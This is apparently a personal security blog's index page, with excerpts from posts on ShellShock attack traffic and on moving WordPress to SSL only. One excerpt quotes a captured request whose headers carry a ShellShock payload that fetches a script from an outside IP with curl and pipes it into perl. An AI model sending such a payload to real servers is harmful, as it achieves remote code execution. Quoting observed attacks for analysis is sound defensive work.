The Cookie Madness

Posted Leave a commentPosted in Attack of the Day

There are a fair number of ShellShock type attacks that come through here every day..  Below is a short example of one.  I have no idea what a tilimilitriam might be, but I would hazard a guess and say it’s doesn’t appear on any page that I’ve crafted (with one exception.. dang). Being such a unique word makes it a great choice for a return value to a script – keeps the false positives down.  I’m working under the assumption that a script is generating all these requests and is waiting to see tilimilitriam show up in the response, at […]

Moving WordPress to SSL Only

Posted Posted in Security Stuffs

I moved my WordPress site to SSL only today..  Very straight forward process as it turns out.  The WordPress Codex pointed me towards the changes required in the application itself.  In your wp-config.php just throw in the following lines: define(‘FORCE_SSL_ADMIN’, true); if ($_SERVER[‘HTTP_X_FORWARDED_PROTO’] == ‘https’) $_SERVER[‘HTTPS’]=’on’; This small piece of configuration tells the system to force all administrative things over SSL.  It also tells the system to look for a X_FORWARDED_PROTO header.  If that value contains https, then use SSL. Since I have a BIG-IP in front of my WordPress instance, we’ll […]

My New Toy

Posted Leave a commentPosted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.. Interesting attack for today…  The attack vector on this one is pretty much like the 100’s of others I’ve seen today.  Hoping for a vulnerable bash version, it would seem.  Assuming they found an open system, they wanted to make sure I received a copy of something. GET /cgi-bin-sdb/printenv HTTP/1.0 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl User-Agent: () { :; }; curl […]